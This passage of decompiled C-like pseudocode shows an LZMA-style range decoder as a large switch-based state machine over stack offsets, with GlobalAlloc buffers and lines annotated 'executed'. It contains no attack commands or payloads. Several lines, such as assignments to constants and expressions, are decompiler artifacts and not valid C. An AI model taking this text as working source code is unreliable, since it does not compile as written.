                  												if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
                  													L10:
                  													if(_t612 == 0) {
                  														L12:
                  														 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
                  														 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                  														goto L15;
                  													} else {
                  														goto L11;
                  													}
                  													do {
                  														L11:
                  														_t612 = _t612 - 1;
                  														 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
                  													} while (_t612 != 0);
                  													goto L12;
                  												}
                  												if( *(_t613 - 4) != 0) {
                  													GlobalFree( *(_t613 - 4));
                  												}
                  												_t534 = GlobalAlloc(0x40, 0x600); // executed
                  												 *(_t613 - 4) = _t534;
                  												if(_t534 == 0) {
                  													goto L171;
                  												} else {
                  													 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
                  													goto L10;
                  												}
                  											case 1:
                  												L13:
                  												__eflags =  *(_t613 - 0x6c);
                  												if( *(_t613 - 0x6c) == 0) {
                  													 *(_t613 - 0x88) = 1;
                  													goto L170;
                  												}
                  												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                  												 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
                  												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                  												_t45 = _t613 - 0x48;
                  												 *_t45 =  *(_t613 - 0x48) + 1;
                  												__eflags =  *_t45;
                  												L15:
                  												if( *(_t613 - 0x48) < 4) {
                  													goto L13;
                  												}
                  												_t546 =  *(_t613 - 0x40);
                  												if(_t546 ==  *(_t613 - 0x74)) {
                  													L20:
                  													 *(_t613 - 0x48) = 5;
                  													 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
                  													goto L23;
                  												}
                  												 *(_t613 - 0x74) = _t546;
                  												if( *(_t613 - 8) != 0) {
                  													GlobalFree( *(_t613 - 8));
                  												}
                  												_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
                  												 *(_t613 - 8) = _t534;
                  												if(_t534 == 0) {
                  													goto L171;
                  												} else {
                  													goto L20;
                  												}
                  											case 2:
                  												L24:
                  												_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
                  												 *(_t613 - 0x84) = 6;
                  												 *(_t613 - 0x4c) = _t553;
                  												_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
                  												L132:
                  												 *(_t613 - 0x54) = _t606;
                  												goto L133;
                  											case 3:
                  												L21:
                  												__eflags =  *(_t613 - 0x6c);
                  												if( *(_t613 - 0x6c) == 0) {
                  													 *(_t613 - 0x88) = 3;
                  													goto L170;
                  												}
                  												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                  												_t67 = _t613 - 0x70;
                  												 *_t67 =  &(( *(_t613 - 0x70))[1]);
                  												__eflags =  *_t67;
                  												 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                  												L23:
                  												 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
                  												if( *(_t613 - 0x48) != 0) {
                  													goto L21;
                  												}
                  												goto L24;
                  											case 4:
                  												L133:
                  												_t531 =  *_t606;
                  												_t589 = _t531 & 0x0000ffff;
                  												_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                  												if( *(_t613 - 0xc) >= _t565) {
                  													 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                  													 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                  													 *(_t613 - 0x40) = 1;
                  													_t532 = _t531 - (_t531 >> 5);
                  													 *_t606 = _t532;
                  												} else {
                  													 *(_t613 - 0x10) = _t565;
                  													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                  													 *_t606 = (0x800 - _t589 >> 5) + _t531;
                  												}
                  												if( *(_t613 - 0x10) >= 0x1000000) {
                  													goto L139;
                  												}
                  											case 5:
                  												goto L137;
                  											case 6:
                  												__edx = 0;
                  												__eflags =  *(__ebp - 0x40);
                  												if( *(__ebp - 0x40) != 0) {
                  													__eax =  *(__ebp - 4);
                  													__ecx =  *(__ebp - 0x38);
                  													 *(__ebp - 0x34) = 1;
                  													 *(__ebp - 0x84) = 7;
                  													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                  													while(1) {
                  														L132:
                  														 *(_t613 - 0x54) = _t606;
                  														goto L133;
                  													}
                  												}
                  												__eax =  *(__ebp - 0x5c) & 0x000000ff;
                  												__esi =  *(__ebp - 0x60);
                  												__cl = 8;
                  												__cl = 8 -  *(__ebp - 0x3c);
                  												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                  												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                  												__ecx =  *(__ebp - 0x3c);
                  												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                  												__ecx =  *(__ebp - 4);
                  												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                  												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                  												__eflags =  *(__ebp - 0x38) - 4;
                  												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                  												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                  												if( *(__ebp - 0x38) >= 4) {
                  													__eflags =  *(__ebp - 0x38) - 0xa;
                  													if( *(__ebp - 0x38) >= 0xa) {
                  														_t98 = __ebp - 0x38;
                  														 *_t98 =  *(__ebp - 0x38) - 6;
                  														__eflags =  *_t98;
                  													} else {
                  														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                  													}
                  												} else {
                  													 *(__ebp - 0x38) = 0;
                  												}
                  												__eflags =  *(__ebp - 0x34) - __edx;
                  												if( *(__ebp - 0x34) == __edx) {
                  													__ebx = 0;
                  													__ebx = 1;
                  													goto L61;
                  												} else {
                  													__eax =  *(__ebp - 0x14);
                  													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                  													__eflags = __eax -  *(__ebp - 0x74);
                  													if(__eax >=  *(__ebp - 0x74)) {
                  														__eax = __eax +  *(__ebp - 0x74);
                  														__eflags = __eax;
                  													}
                  													__ecx =  *(__ebp - 8);
                  													__ebx = 0;
                  													__ebx = 1;
                  													__al =  *((intOrPtr*)(__eax + __ecx));
                  													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                  													goto L41;
                  												}
                  											case 7:
                  												__eflags =  *(__ebp - 0x40) - 1;
                  												if( *(__ebp - 0x40) != 1) {
                  													__eax =  *(__ebp - 0x24);
                  													 *(__ebp - 0x80) = 0x16;
                  													 *(__ebp - 0x20) =  *(__ebp - 0x24);
                  													__eax =  *(__ebp - 0x28);
                  													 *(__ebp - 0x24) =  *(__ebp - 0x28);
                  													__eax =  *(__ebp - 0x2c);
                  													 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                  													__eax = 0;
                  													__eflags =  *(__ebp - 0x38) - 7;
                  													0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                  													__al = __al & 0x000000fd;
                  													__eax = (__eflags >= 0) - 1 + 0xa;
                  													 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                  													__eax =  *(__ebp - 4);
                  													__eax =  *(__ebp - 4) + 0x664;
                  													__eflags = __eax;
                  													 *(__ebp - 0x58) = __eax;
                  													goto L69;
                  												}
                  												__eax =  *(__ebp - 4);
                  												__ecx =  *(__ebp - 0x38);
                  												 *(__ebp - 0x84) = 8;
                  												__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                  												while(1) {
                  													L132:
                  													 *(_t613 - 0x54) = _t606;
                  													goto L133;
                  												}
                  											case 8:
                  												__eflags =  *(__ebp - 0x40);
                  												if( *(__ebp - 0x40) != 0) {
                  													__eax =  *(__ebp - 4);
                  													__ecx =  *(__ebp - 0x38);
                  													 *(__ebp - 0x84) = 0xa;
                  													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                  												} else {
                  													__eax =  *(__ebp - 0x38);
                  													__ecx =  *(__ebp - 4);
                  													__eax =  *(__ebp - 0x38) + 0xf;
                  													 *(__ebp - 0x84) = 9;
                  													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                  													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                  												}
                  												while(1) {
                  													L132:
                  													 *(_t613 - 0x54) = _t606;
                  													goto L133;
                  												}
                  											case 9:
                  												__eflags =  *(__ebp - 0x40);
                  												if( *(__ebp - 0x40) != 0) {
                  													goto L89;
                  												}
                  												__eflags =  *(__ebp - 0x60);
                  												if( *(__ebp - 0x60) == 0) {
                  													goto L171;
                  												}
                  												__eax = 0;
                  												__eflags =  *(__ebp - 0x38) - 7;
                  												_t259 =  *(__ebp - 0x38) - 7 >= 0;
                  												__eflags = _t259;
                  												0 | _t259 = _t259 + _t259 + 9;
                  												 *(__ebp - 0x38) = _t259 + _t259 + 9;
                  												goto L76;
                  											case 0xa:
                  												goto L0;
                  											case 0xb:
                  												__eflags =  *(__ebp - 0x40);
                  												if( *(__ebp - 0x40) != 0) {
                  													__ecx =  *(__ebp - 0x24);
                  													__eax =  *(__ebp - 0x20);
                  													 *(__ebp - 0x20) =  *(__ebp - 0x24);
                  												} else {
                  													__eax =  *(__ebp - 0x24);
                  												}
                  												__ecx =  *(__ebp - 0x28);
                  												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                  												goto L88;
                  											case 0xc:
                  												L99:
                  												__eflags =  *(__ebp - 0x6c);
                  												if( *(__ebp - 0x6c) == 0) {
                  													 *(__ebp - 0x88) = 0xc;
                  													goto L170;
                  												}
                  												__ecx =  *(__ebp - 0x70);
                  												__eax =  *(__ebp - 0xc);
                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                  												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                  												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                  												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                  												_t334 = __ebp - 0x70;
                  												 *_t334 =  *(__ebp - 0x70) + 1;
                  												__eflags =  *_t334;
                  												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                  												__eax =  *(__ebp - 0x2c);
                  												goto L101;
                  											case 0xd:
                  												L37:
                  												__eflags =  *(__ebp - 0x6c);
                  												if( *(__ebp - 0x6c) == 0) {
                  													 *(__ebp - 0x88) = 0xd;
                  													goto L170;
                  												}
                  												__ecx =  *(__ebp - 0x70);
                  												__eax =  *(__ebp - 0xc);
                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                  												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                  												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                  												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                  												_t122 = __ebp - 0x70;
                  												 *_t122 =  *(__ebp - 0x70) + 1;
                  												__eflags =  *_t122;
                  												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                  												L39:
                  												__eax =  *(__ebp - 0x40);
                  												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                  												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                  													goto L48;
                  												}
                  												__eflags = __ebx - 0x100;
                  												if(__ebx >= 0x100) {
                  													goto L54;
                  												}
                  												L41:
                  												__eax =  *(__ebp - 0x5b) & 0x000000ff;
                  												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                  												__ecx =  *(__ebp - 0x58);
                  												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                  												 *(__ebp - 0x48) = __eax;
                  												__eax = __eax + 1;
                  												__eax = __eax << 8;
                  												__eax = __eax + __ebx;
                  												__esi =  *(__ebp - 0x58) + __eax * 2;
                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                  												__ax =  *__esi;
                  												 *(__ebp - 0x54) = __esi;
                  												__edx = __ax & 0x0000ffff;
                  												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                  												__eflags =  *(__ebp - 0xc) - __ecx;
                  												if( *(__ebp - 0xc) >= __ecx) {
                  													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                  													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                  													__cx = __ax;
                  													 *(__ebp - 0x40) = 1;
                  													__cx = __ax >> 5;
                  													__eflags = __eax;
                  													__ebx = __ebx + __ebx + 1;
                  													 *__esi = __ax;
                  												} else {
                  													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                  													 *(__ebp - 0x10) = __ecx;
                  													0x800 = 0x800 - __edx;
                  													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                  													__ebx = __ebx + __ebx;
                  													 *__esi = __cx;
                  												}
                  												__eflags =  *(__ebp - 0x10) - 0x1000000;
                  												 *(__ebp - 0x44) = __ebx;
                  												if( *(__ebp - 0x10) >= 0x1000000) {
                  													goto L39;
                  												} else {
                  													goto L37;
                  												}
                  											case 0xe:
                  												L46:
                  												__eflags =  *(__ebp - 0x6c);
                  												if( *(__ebp - 0x6c) == 0) {
                  													 *(__ebp - 0x88) = 0xe;
                  													goto L170;
                  												}
                  												__ecx =  *(__ebp - 0x70);
                  												__eax =  *(__ebp - 0xc);
                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                  												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                  												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                  												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                  												_t156 = __ebp - 0x70;
                  												 *_t156 =  *(__ebp - 0x70) + 1;
                  												__eflags =  *_t156;
                  												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                  												while(1) {
                  													L48:
                  													__eflags = __ebx - 0x100;
                  													if(__ebx >= 0x100) {
                  														break;
                  													}
                  													__eax =  *(__ebp - 0x58);
                  													__edx = __ebx + __ebx;
                  													__ecx =  *(__ebp - 0x10);
                  													__esi = __edx + __eax;
                  													__ecx =  *(__ebp - 0x10) >> 0xb;
                  													__ax =  *__esi;
                  													 *(__ebp - 0x54) = __esi;
                  													__edi = __ax & 0x0000ffff;
                  													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                  													__eflags =  *(__ebp - 0xc) - __ecx;
                  													if( *(__ebp - 0xc) >= __ecx) {
                  														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                  														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                  														__cx = __ax;
                  														_t170 = __edx + 1; // 0x1
                  														__ebx = _t170;
                  														__cx = __ax >> 5;
                  														__eflags = __eax;
                  														 *__esi = __ax;
                  													} else {
                  														 *(__ebp - 0x10) = __ecx;
                  														0x800 = 0x800 - __edi;
                  														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                  														__ebx = __ebx + __ebx;
                  														 *__esi = __cx;
                  													}
                  													__eflags =  *(__ebp - 0x10) - 0x1000000;
                  													 *(__ebp - 0x44) = __ebx;
                  													if( *(__ebp - 0x10) >= 0x1000000) {
                  														continue;
                  													} else {
                  														goto L46;
                  													}
                  												}
                  												L54:
                  												_t173 = __ebp - 0x34;
                  												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                  												__eflags =  *_t173;
                  												goto L55;
                  											case 0xf:
                  												L58:
                  												__eflags =  *(__ebp - 0x6c);
                  												if( *(__ebp - 0x6c) == 0) {
                  													 *(__ebp - 0x88) = 0xf;
                  													goto L170;
                  												}
                  												__ecx =  *(__ebp - 0x70);
                  												__eax =  *(__ebp - 0xc);
                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                  												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                  												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                  												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                  												_t203 = __ebp - 0x70;
                  												 *_t203 =  *(__ebp - 0x70) + 1;
                  												__eflags =  *_t203;
                  												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                  												L60:
                  												__eflags = __ebx - 0x100;
                  												if(__ebx >= 0x100) {
                  													L55:
                  													__al =  *(__ebp - 0x44);
                  													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                  													goto L56;
                  												}
                  												L61:
                  												__eax =  *(__ebp - 0x58);
                  												__edx = __ebx + __ebx;
                  												__ecx =  *(__ebp - 0x10);
                  												__esi = __edx + __eax;
                  												__ecx =  *(__ebp - 0x10) >> 0xb;
                  												__ax =  *__esi;
                  												 *(__ebp - 0x54) = __esi;
                  												__edi = __ax & 0x0000ffff;
                  												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                  												__eflags =  *(__ebp - 0xc) - __ecx;
                  												if( *(__ebp - 0xc) >= __ecx) {
                  													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                  													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                  													__cx = __ax;
                  													_t217 = __edx + 1; // 0x1
                  													__ebx = _t217;
                  													__cx = __ax >> 5;
                  													__eflags = __eax;
                  													 *__esi = __ax;
                  												} else {
                  													 *(__ebp - 0x10) = __ecx;
                  													0x800 = 0x800 - __edi;
                  													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                  													__ebx = __ebx + __ebx;
                  													 *__esi = __cx;
                  												}
                  												__eflags =  *(__ebp - 0x10) - 0x1000000;
                  												 *(__ebp - 0x44) = __ebx;
                  												if( *(__ebp - 0x10) >= 0x1000000) {
                  													goto L60;
                  												} else {
                  													goto L58;
                  												}
                  											case 0x10:
                  												L109:
                  												__eflags =  *(__ebp - 0x6c);
                  												if( *(__ebp - 0x6c) == 0) {
                  													 *(__ebp - 0x88) = 0x10;
                  													goto L170;
                  												}
                  												__ecx =  *(__ebp - 0x70);
                  												__eax =  *(__ebp - 0xc);
                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                  												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                  												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                  												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                  												_t365 = __ebp - 0x70;
                  												 *_t365 =  *(__ebp - 0x70) + 1;
                  												__eflags =  *_t365;
                  												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                  												goto L111;
                  											case 0x11:
                  												goto L69;
                  											case 0x12:
                  												__eflags =  *(__ebp - 0x40);
                  												if( *(__ebp - 0x40) != 0) {
                  													__eax =  *(__ebp - 0x58);
                  													 *(__ebp - 0x84) = 0x13;
                  													__esi =  *(__ebp - 0x58) + 2;
                  													while(1) {
                  														L132:
                  														 *(_t613 - 0x54) = _t606;
                  														goto L133;
                  													}
                  												}
                  												__eax =  *(__ebp - 0x4c);
                  												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                  												__ecx =  *(__ebp - 0x58);
                  												__eax =  *(__ebp - 0x4c) << 4;
                  												__eflags = __eax;
                  												__eax =  *(__ebp - 0x58) + __eax + 4;
                  												goto L130;
                  											case 0x13:
                  												__eflags =  *(__ebp - 0x40);
                  												if( *(__ebp - 0x40) != 0) {
                  													_t469 = __ebp - 0x58;
                  													 *_t469 =  *(__ebp - 0x58) + 0x204;
                  													__eflags =  *_t469;
                  													 *(__ebp - 0x30) = 0x10;
                  													 *(__ebp - 0x40) = 8;
                  													L144:
                  													 *(__ebp - 0x7c) = 0x14;
                  													goto L145;
                  												}
                  												__eax =  *(__ebp - 0x4c);
                  												__ecx =  *(__ebp - 0x58);
                  												__eax =  *(__ebp - 0x4c) << 4;
                  												 *(__ebp - 0x30) = 8;
                  												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                  												L130:
                  												 *(__ebp - 0x58) = __eax;
                  												 *(__ebp - 0x40) = 3;
                  												goto L144;
                  											case 0x14:
                  												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                  												__eax =  *(__ebp - 0x80);
                  												 *(_t613 - 0x88) = _t533;
                  												goto L1;
                  											case 0x15:
                  												__eax = 0;
                  												__eflags =  *(__ebp - 0x38) - 7;
                  												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                  												__al = __al & 0x000000fd;
                  												__eax = (__eflags >= 0) - 1 + 0xb;
                  												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                  												goto L120;
                  											case 0x16:
                  												__eax =  *(__ebp - 0x30);
                  												__eflags = __eax - 4;
                  												if(__eax >= 4) {
                  													_push(3);
                  													_pop(__eax);
                  												}
                  												__ecx =  *(__ebp - 4);
                  												 *(__ebp - 0x40) = 6;
                  												__eax = __eax << 7;
                  												 *(__ebp - 0x7c) = 0x19;
                  												 *(__ebp - 0x58) = __eax;
                  												goto L145;
                  											case 0x17:
                  												L145:
                  												__eax =  *(__ebp - 0x40);
                  												 *(__ebp - 0x50) = 1;
                  												 *(__ebp - 0x48) =  *(__ebp - 0x40);
                  												goto L149;
                  											case 0x18:
                  												L146:
                  												__eflags =  *(__ebp - 0x6c);
                  												if( *(__ebp - 0x6c) == 0) {
                  													 *(__ebp - 0x88) = 0x18;
                  													goto L170;
                  												}
                  												__ecx =  *(__ebp - 0x70);
                  												__eax =  *(__ebp - 0xc);
                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                  												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                  												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                  												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                  												_t484 = __ebp - 0x70;
                  												 *_t484 =  *(__ebp - 0x70) + 1;
                  												__eflags =  *_t484;
                  												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                  												L148:
                  												_t487 = __ebp - 0x48;
                  												 *_t487 =  *(__ebp - 0x48) - 1;
                  												__eflags =  *_t487;
                  												L149:
                  												__eflags =  *(__ebp - 0x48);
                  												if( *(__ebp - 0x48) <= 0) {
                  													__ecx =  *(__ebp - 0x40);
                  													__ebx =  *(__ebp - 0x50);
                  													0 = 1;
                  													__eax = 1 << __cl;
                  													__ebx =  *(__ebp - 0x50) - (1 << __cl);
                  													__eax =  *(__ebp - 0x7c);
                  													 *(__ebp - 0x44) = __ebx;
                  													while(1) {
                  														 *(_t613 - 0x88) = _t533;
                  														goto L1;
                  													}
                  												}
                  												__eax =  *(__ebp - 0x50);
                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                  												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                  												__eax =  *(__ebp - 0x58);
                  												__esi = __edx + __eax;
                  												 *(__ebp - 0x54) = __esi;
                  												__ax =  *__esi;
                  												__edi = __ax & 0x0000ffff;
                  												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                  												__eflags =  *(__ebp - 0xc) - __ecx;
                  												if( *(__ebp - 0xc) >= __ecx) {
                  													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                  													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                  													__cx = __ax;
                  													__cx = __ax >> 5;
                  													__eax = __eax - __ecx;
                  													__edx = __edx + 1;
                  													__eflags = __edx;
                  													 *__esi = __ax;
                  													 *(__ebp - 0x50) = __edx;
                  												} else {
                  													 *(__ebp - 0x10) = __ecx;
                  													0x800 = 0x800 - __edi;
                  													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                  													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                  													 *__esi = __cx;
                  												}
                  												__eflags =  *(__ebp - 0x10) - 0x1000000;
                  												if( *(__ebp - 0x10) >= 0x1000000) {
                  													goto L148;
                  												} else {
                  													goto L146;
                  												}
                  											case 0x19:
                  												__eflags = __ebx - 4;
                  												if(__ebx < 4) {
                  													 *(__ebp - 0x2c) = __ebx;
                  													L119:
                  													_t393 = __ebp - 0x2c;
                  													 *_t393 =  *(__ebp - 0x2c) + 1;
                  													__eflags =  *_t393;
                  													L120:
                  													__eax =  *(__ebp - 0x2c);
                  													__eflags = __eax;
                  													if(__eax == 0) {
                  														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                  														goto L170;
                  													}
                  													__eflags = __eax -  *(__ebp - 0x60);
                  													if(__eax >  *(__ebp - 0x60)) {
                  														goto L171;
                  													}
                  													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                  													__eax =  *(__ebp - 0x30);
                  													_t400 = __ebp - 0x60;
                  													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                  													__eflags =  *_t400;
                  													goto L123;
                  												}
                  												__ecx = __ebx;
                  												__eax = __ebx;
                  												__ecx = __ebx >> 1;
                  												__eax = __ebx & 0x00000001;
                  												__ecx = (__ebx >> 1) - 1;
                  												__al = __al | 0x00000002;
                  												__eax = (__ebx & 0x00000001) << __cl;
                  												__eflags = __ebx - 0xe;
                  												 *(__ebp - 0x2c) = __eax;
                  												if(__ebx >= 0xe) {
                  													__ebx = 0;
                  													 *(__ebp - 0x48) = __ecx;
                  													L102:
                  													__eflags =  *(__ebp - 0x48);
                  													if( *(__ebp - 0x48) <= 0) {
                  														__eax = __eax + __ebx;
                  														 *(__ebp - 0x40) = 4;
                  														 *(__ebp - 0x2c) = __eax;
                  														__eax =  *(__ebp - 4);
                  														__eax =  *(__ebp - 4) + 0x644;
                  														__eflags = __eax;
                  														L108:
                  														__ebx = 0;
                  														 *(__ebp - 0x58) = __eax;
                  														 *(__ebp - 0x50) = 1;
                  														 *(__ebp - 0x44) = 0;
                  														 *(__ebp - 0x48) = 0;
                  														L112:
                  														__eax =  *(__ebp - 0x40);
                  														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                  														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                  															_t391 = __ebp - 0x2c;
                  															 *_t391 =  *(__ebp - 0x2c) + __ebx;
                  															__eflags =  *_t391;
                  															goto L119;
                  														}
                  														__eax =  *(__ebp - 0x50);
                  														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                  														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                  														__eax =  *(__ebp - 0x58);
                  														__esi = __edi + __eax;
                  														 *(__ebp - 0x54) = __esi;
                  														__ax =  *__esi;
                  														__ecx = __ax & 0x0000ffff;
                  														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                  														__eflags =  *(__ebp - 0xc) - __edx;
                  														if( *(__ebp - 0xc) >= __edx) {
                  															__ecx = 0;
                  															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                  															__ecx = 1;
                  															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                  															__ebx = 1;
                  															__ecx =  *(__ebp - 0x48);
                  															__ebx = 1 << __cl;
                  															__ecx = 1 << __cl;
                  															__ebx =  *(__ebp - 0x44);
                  															__ebx =  *(__ebp - 0x44) | __ecx;
                  															__cx = __ax;
                  															__cx = __ax >> 5;
                  															__eax = __eax - __ecx;
                  															__edi = __edi + 1;
                  															__eflags = __edi;
                  															 *(__ebp - 0x44) = __ebx;
                  															 *__esi = __ax;
                  															 *(__ebp - 0x50) = __edi;
                  														} else {
                  															 *(__ebp - 0x10) = __edx;
                  															0x800 = 0x800 - __ecx;
                  															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
